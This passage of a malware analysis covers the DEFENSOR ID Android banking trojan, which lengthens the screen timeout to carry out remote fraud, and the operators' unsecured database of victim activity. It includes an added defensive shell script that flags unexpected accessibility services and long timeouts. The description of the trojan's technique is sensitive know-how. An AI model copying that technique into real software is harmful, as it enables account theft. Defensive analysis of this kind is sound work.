We believe that this is the reason the DEFENSOR ID trojan requests the user to allow “Modify system settings”. Subsequently, the malware changes the screen-off timeout to 10 minutes. This means that, unless victims lock their devices via the hardware button, the timer gives the malware plenty of time to remotely perform malicious in-app operations.

If the device gets locked, the malware can’t unlock it.
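The two device settings the trojan depends on (an enabled accessibility service and a lengthened screen-off timeout) can be audited from the defender’s side. The script below is an added example, not code from the ESET report; the service list, the allowlist and the package name com.example.defensor are constructed sample values, and on a real device the two inputs would come from the adb commands named in the comments.

```shell
# Added example, not code from the ESET report: audits the two device settings
# DEFENSOR ID relies on. On a real device the values would come from
# `adb shell settings get secure enabled_accessibility_services` and
# `adb shell settings get system screen_off_timeout`; here they are constructed.

# Constructed sample: one legitimate service plus a hypothetical trojan package.
SAMPLE_A11Y='com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:com.example.defensor/com.example.defensor.AccService'
SAMPLE_TIMEOUT=600000   # 10 minutes in ms, the value the report says the malware sets

# Hypothetical allowlist of accessibility service packages the fleet is expected to run.
ALLOWED_A11Y_PKGS='com.google.android.marvin.talkback'

# Print every enabled accessibility service whose package is not allowlisted.
# Returns 1 if any such service is enabled, 0 otherwise.
audit_accessibility() {
    enabled=$1
    found=0
    if [ -z "$enabled" ]; then
        return 0
    fi
    old_ifs=$IFS
    IFS=':'
    set -- $enabled          # the setting is a colon-separated list of package/class
    IFS=$old_ifs
    for svc in "$@"; do
        pkg=${svc%%/*}       # package name is the part before the slash
        case " $ALLOWED_A11Y_PKGS " in
            *" $pkg "*) ;;   # expected assistive app
            *) echo "UNEXPECTED accessibility service: $svc"; found=1 ;;
        esac
    done
    return $found
}

# Flag a screen-off timeout at or above the 10-minute value the trojan sets.
# Returns 1 when the timeout looks tampered with, 0 otherwise.
audit_screen_timeout() {
    timeout_ms=$1
    if [ "$timeout_ms" -ge 600000 ] 2>/dev/null; then
        echo "SUSPICIOUS screen_off_timeout: ${timeout_ms} ms"
        return 1
    fi
    return 0
}

status=0
audit_accessibility "$SAMPLE_A11Y" || status=1
audit_screen_timeout "$SAMPLE_TIMEOUT" || status=1
[ "$status" -eq 0 ] || echo "device settings match the DEFENSOR ID pattern; investigate"
```

A timeout hit on its own is only a weak signal (users do raise it), so treat the accessibility finding as the primary indicator and the timeout as corroboration.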

Malware data leak

When we analyzed the sample, we realized that the malware operators left the remote database with some of the victims’ data freely accessible, without any authentication. The database contained the last activity performed on around 60 compromised devices. We found no other information stolen from the victims to be accessible.

Thanks to this data leak, we were able to confirm that the malware really worked as designed: the attacker had access to the victims’ entered credentials, displayed or written emails and messages, etc.

Once we reached the non-secured database, we were able to directly observe the app’s malicious behavior. To illustrate the level of threat the DEFENSOR ID app posed, we performed three tests.

First, we launched a banking app and entered the credentials there. The credentials were immediately available in the leaky database –